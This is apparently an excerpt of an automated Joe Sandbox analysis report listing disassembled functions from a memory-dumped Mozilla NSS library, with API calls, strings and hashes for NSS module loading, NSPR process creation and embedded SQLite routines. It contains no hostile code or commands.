free.MOZGLUE(00000000), ref: 6C6F75C8
free.MOZGLUE(00000000), ref: 6C6F75F1
PR_NewLock.NSS3 ref: 6C6F7636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C6F7686
PR_NewLock.NSS3 ref: 6C6F76A2

Part of subcall function 6C7A98D0: calloc.MOZGLUE(00000001,00000084,6C6D0936,00000001,?,6C6D102C), ref: 6C7A98E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C6F76B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C6F7707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C6F771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C6F7731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C6F774A
DeleteCriticalSection.KERNEL32(?), ref: 6C6F7770
free.MOZGLUE(?), ref: 6C6F7779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F77AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C6F77C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6F77DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C6F7821
PORT_Alloc_Util.NSS3(?), ref: 6C6F7837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C6F785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6F786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C6F78AC
free.MOZGLUE(00000000), ref: 6C6F78BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C6F78F3
free.MOZGLUE(00000000), ref: 6C6F78FC
free.MOZGLUE(00000000), ref: 6C6F791C

Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07AD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07CD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07D6
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C66204A), ref: 6C6D07E4
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,6C66204A), ref: 6C6D0864
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6D0880
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C66204A), ref: 6C6D08CB
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08D7
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08FB

Strings

rdb:, xrefs: 6C6F7744
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C6F74C7
kbi., xrefs: 6C6F7886
,defaultModDB,internalKeySlot, xrefs: 6C6F748D, 6C6F74AA
dbm:, xrefs: 6C6F7716
sql:, xrefs: 6C6F76FE
NSS Internal Module, xrefs: 6C6F74A2, 6C6F74C6
Spac, xrefs: 6C6F7389
dll, xrefs: 6C6F788E
extern:, xrefs: 6C6F772B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 4acbaaa91f9d834597ae101993b840dfc1149997feeeef3664c22395599d679f
Instruction ID: 9e5ed36edf989335aab433eb54d169968ee7c450d182535fd8e455eb56045cfe
Opcode Fuzzy Hash: 4acbaaa91f9d834597ae101993b840dfc1149997feeeef3664c22395599d679f
Instruction Fuzzy Hash: 095223B1E05205DBEB219F64CD09BAA7BB2AF0530CF144538EC29A3B41E731E915CBD6

Function 6C71BFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6C71C0C8

Part of subcall function 6C7A9440: LeaveCriticalSection.KERNEL32 ref: 6C7A95CD
Part of subcall function 6C7A9440: TlsGetValue.KERNEL32 ref: 6C7A9622
Part of subcall function 6C7A9440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C7A964E

PR_EnterMonitor.NSS3 ref: 6C71C0AE

Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A91AA
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9212
Part of subcall function 6C7A9090: _PR_MD_WAIT_CV.NSS3 ref: 6C7A926B

Part of subcall function 6C6D0600: GetLastError.KERNEL32(?,?,?,?,?,6C6D05E2), ref: 6C6D0642
Part of subcall function 6C6D0600: TlsGetValue.KERNEL32(?,?,?,?,?,6C6D05E2), ref: 6C6D065D
Part of subcall function 6C6D0600: GetLastError.KERNEL32 ref: 6C6D0678
Part of subcall function 6C6D0600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C6D068A
Part of subcall function 6C6D0600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6D0693
Part of subcall function 6C6D0600: PR_SetErrorText.NSS3(00000000,?), ref: 6C6D069D
Part of subcall function 6C6D0600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,407E7CC6,?,?,?,?,?,6C6D05E2), ref: 6C6D06CA
Part of subcall function 6C6D0600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C6D05E2), ref: 6C6D06E6

PR_EnterMonitor.NSS3 ref: 6C71C0F2
PR_ExitMonitor.NSS3 ref: 6C71C10E
PR_ExitMonitor.NSS3 ref: 6C71C081

Part of subcall function 6C7A9440: TlsGetValue.KERNEL32 ref: 6C7A945B
Part of subcall function 6C7A9440: TlsGetValue.KERNEL32 ref: 6C7A9479
Part of subcall function 6C7A9440: EnterCriticalSection.KERNEL32 ref: 6C7A9495
Part of subcall function 6C7A9440: TlsGetValue.KERNEL32 ref: 6C7A94E4
Part of subcall function 6C7A9440: TlsGetValue.KERNEL32 ref: 6C7A9532
Part of subcall function 6C7A9440: LeaveCriticalSection.KERNEL32 ref: 6C7A955D

PR_EnterMonitor.NSS3 ref: 6C71C068

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

Part of subcall function 6C6D0600: GetProcAddress.KERNEL32(?,?), ref: 6C6D0623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C71C14F
PR_LoadLibraryWithFlags.NSS3 ref: 6C71C183
free.MOZGLUE(00000000), ref: 6C71C18E
PR_LoadLibrary.NSS3(?), ref: 6C71C1A3
PR_EnterMonitor.NSS3 ref: 6C71C1D4
PR_ExitMonitor.NSS3 ref: 6C71C1F3
PR_CallOnce.NSS3(6C842318,6C71CA70), ref: 6C71C210
PR_EnterMonitor.NSS3 ref: 6C71C22B
PR_ExitMonitor.NSS3 ref: 6C71C247
PR_EnterMonitor.NSS3 ref: 6C71C26A
PR_ExitMonitor.NSS3 ref: 6C71C287
PR_UnloadLibrary.NSS3(?), ref: 6C71C2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C71C392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C71C3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6C71C3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C71C782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C71C7B5
PR_UnloadLibrary.NSS3(?), ref: 6C71C7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6C71C82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C71C8BF
PORT_Alloc_Util.NSS3(?), ref: 6C71C8D5
free.MOZGLUE(00000000), ref: 6C71C900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C71C9C7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C71C9E5
free.MOZGLUE(00000000), ref: 6C71CA5A

Strings

NSC_GetFunctionList, xrefs: 6C71C093
NSS_FORCE_TOKEN_LOCK, xrefs: 6C71C77D
NSS_DISABLE_UNLOAD, xrefs: 6C71C7B0
nss_mod_log, xrefs: 6C71C3CC
Vendor NSS FIPS Interface, xrefs: 6C71C34A
NSC_ModuleDBFunc, xrefs: 6C71C0FC
NSS_DEBUG_PKCS11_MODULE, xrefs: 6C71C38D
PKCS 11, xrefs: 6C71C2F9, 6C71C314
NSS_ReturnModuleSpecData, xrefs: 6C71C275
NSC_GetInterface, xrefs: 6C71C04F
FC_GetInterface, xrefs: 6C71C054
FC_GetFunctionList, xrefs: 6C71C098

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: 8932501704a7e57bf62d00d42ccb88e4bac3b503e32d9b2420d80febde90df64
Instruction ID: 2eb36b1ec2df64cafaed0d1e8e473dd408af9ff1acd64f0741424e61a6769044
Opcode Fuzzy Hash: 8932501704a7e57bf62d00d42ccb88e4bac3b503e32d9b2420d80febde90df64
Instruction Fuzzy Hash: E1428DB1A0C2149FDB20EFA5DA4AB5A7BB1BB4631CF088039D8058BF21E739D555CBD1

Function 6C7F3FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6C7F3FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7F3FFE
malloc.MOZGLUE(-00000003), ref: 6C7F4016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C82FC62), ref: 6C7F404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C7F407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C7F40A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C7F40D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C7F4112
malloc.MOZGLUE(00000000), ref: 6C7F411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C7F414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C7F4160
free.MOZGLUE(?), ref: 6C7F416C
malloc.MOZGLUE(?), ref: 6C7F41AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C7F41EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C7F4520), ref: 6C7F4244
GetEnvironmentStrings.KERNEL32 ref: 6C7F424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F4263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F4283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F42B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F42E4
malloc.MOZGLUE(00000002), ref: 6C7F42FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C7F4342
GetStdHandle.KERNEL32(000000F6), ref: 6C7F43AB
GetStdHandle.KERNEL32(000000F5), ref: 6C7F43B2
GetStdHandle.KERNEL32(000000F4), ref: 6C7F43B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C7F4403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C7F4410

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C7F445E
CloseHandle.KERNEL32(?), ref: 6C7F446B
free.MOZGLUE(?), ref: 6C7F4482
free.MOZGLUE(00000000), ref: 6C7F4492
free.MOZGLUE(00000000), ref: 6C7F44A4
GetLastError.KERNEL32 ref: 6C7F44B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C7F44BE
free.MOZGLUE(?), ref: 6C7F44C7
free.MOZGLUE(00000000), ref: 6C7F44D5
free.MOZGLUE(00000000), ref: 6C7F44EA

Strings

NSPR_INHERIT_FDS=, xrefs: 6C7F41E9
=, xrefs: 6C7F44F8
D, xrefs: 6C7F4396

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 10890e51962e5f5f7e04bf39b461bd36d9ed91eb180ae6059cbe02e4d8b315ca
Instruction ID: e32b7030ba4900ac3c4df60cc8734df9a7f7c8e134fc4c6fd2893d9b9fa83077
Opcode Fuzzy Hash: 10890e51962e5f5f7e04bf39b461bd36d9ed91eb180ae6059cbe02e4d8b315ca
Instruction Fuzzy Hash: 44020671E043159BEB209FA9CBC47AEBBB4AF05358F244138DC79A7742D7709806DB91

Function 6C706D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C80A8EC,0000006C), ref: 6C706DC6
memcpy.VCRUNTIME140(?,6C80A958,0000006C), ref: 6C706DDB
memcpy.VCRUNTIME140(?,6C80A9C4,00000078), ref: 6C706DF1
memcpy.VCRUNTIME140(?,6C80AA3C,0000006C), ref: 6C706E06
memcpy.VCRUNTIME140(?,6C80AAA8,00000060), ref: 6C706E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C706E38

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C706E76
TlsGetValue.KERNEL32 ref: 6C70726F
EnterCriticalSection.KERNEL32(?), ref: 6C707283

Strings

!, xrefs: 6C707123

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 4721d1a51bf77d0170dd54132188e24995e82056a68e96ec56ee3bfdc560d392
Instruction ID: 96ab0942ec23be6caebca60cb2401b68ff5e95db374bcba2a50e847189360305
Opcode Fuzzy Hash: 4721d1a51bf77d0170dd54132188e24995e82056a68e96ec56ee3bfdc560d392
Instruction Fuzzy Hash: ED729FB5E052189FDB60DF28CD8879ABBF5BF49308F1041A9D80DA7741E731AA85CF90

Function 6C673C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C673C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C673D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C673EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C673ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C673F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C674052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C67410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C67449C

Strings

database corruption, xrefs: 6C674490, 6C6744F4, 6C674599, 6C674764, 6C674804
%s at line %d of [%.10s], xrefs: 6C674495, 6C6744F9, 6C67459E, 6C674769, 6C674809
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C674452, 6C674486, 6C6744EA, 6C674571, 6C674580, 6C67458F, 6C67475A, 6C6747FA

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: 712569b703b8c8a2f795829cada6208144e6869480d69695125b75913e1205ef
Instruction ID: 5b7b6d66c0b06e4431c9030e9a072e02679f5afe36bd0e7f8b426f47e7676564
Opcode Fuzzy Hash: 712569b703b8c8a2f795829cada6208144e6869480d69695125b75913e1205ef
Instruction Fuzzy Hash: C982B070A04205CFCB24CF69C588BA977F2BF49318F258968D905ABB51E771EC42CFA5

Function 6C74AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C74ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C74ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C74ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C74AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C74ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74ADF0

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C74B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C74B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C74B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C74B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C74B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74B40C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 173c3eb1272cbdcb731bb9938000be5e0f49723230b24c17def2b84ded5145f0
Instruction ID: 91f0f3dedb1071af57d843d1e506fa756f3701c4b9f8b1a5fe9396210a40af4a
Opcode Fuzzy Hash: 173c3eb1272cbdcb731bb9938000be5e0f49723230b24c17def2b84ded5145f0
Instruction Fuzzy Hash: BA22BF71904301AFE710CF24CE49B9A77E1AF8431CF24C578E9585B7A2E772E859CB92

Function 6C691F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6925F3

Strings

a NATURAL join may not have an ON or USING clause, xrefs: 6C6932C1
no such table: %s, xrefs: 6C6926AC
too many columns in result set, xrefs: 6C693012
%s.%s, xrefs: 6C692D68
multiple recursive references: %s, xrefs: 6C6922E0
no tables specified, xrefs: 6C6926BE
unsafe use of virtual table "%s", xrefs: 6C6930D1
%s.%s.%s, xrefs: 6C69302D
H, xrefs: 6C69322D
cannot have both ON and USING clauses in the same join, xrefs: 6C6932B5
H, xrefs: 6C69329F
no such index: "%s", xrefs: 6C69319D
recursive reference in a subquery: %s, xrefs: 6C6922E5
'%s' is not a function, xrefs: 6C692FD2
cannot join using column %s - column not present in both tables, xrefs: 6C6932AB
too many references to "%s": max 65535, xrefs: 6C692FB6
access to view "%s" prohibited, xrefs: 6C692F4A
table %s has %d values for %d columns, xrefs: 6C69316C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: 72fe38c24bc6f7b328c4ede5c7e9eb7e390df39ea12eaea775ee72abd1010e6c
Instruction ID: 4a8715fc9f52418862c02e11d106d1312ade9fb43517559190513b2d235f9236
Opcode Fuzzy Hash: 72fe38c24bc6f7b328c4ede5c7e9eb7e390df39ea12eaea775ee72abd1010e6c
Instruction Fuzzy Hash: F6D27E74E0420ACFDB04CF95C498BEDB7B1FF49318F288169D859ABB51D731A846CB58

Function 6C6CECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C6CED38

Part of subcall function 6C664F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C664FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C6CEF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C6CEFE4

Part of subcall function 6C78DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C665001,?,00000003,00000000), ref: 6C78DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C6CF087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C6CF129
sqlite3_mprintf.NSS3(optimize), ref: 6C6CF1D1
sqlite3_free.NSS3(?), ref: 6C6CF368

Strings

simple, xrefs: 6C6CED79
fts4aux, xrefs: 6C6CECF9
optimize, xrefs: 6C6CF199, 6C6CF1CC, 6C6CF211
matchinfo, xrefs: 6C6CF04F, 6C6CF082, 6C6CF0C2, 6C6CF0F2, 6C6CF124, 6C6CF169
unicode61, xrefs: 6C6CEDB5
offsets, xrefs: 6C6CEFAF, 6C6CEFDF, 6C6CF01F
fts4, xrefs: 6C6CF2AD
snippet, xrefs: 6C6CEF05, 6C6CEF37, 6C6CEF7C
fts3, xrefs: 6C6CF247
fts3tokenize, xrefs: 6C6CF30F
porter, xrefs: 6C6CED97
fts3_tokenizer, xrefs: 6C6CEE1A, 6C6CEEA8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
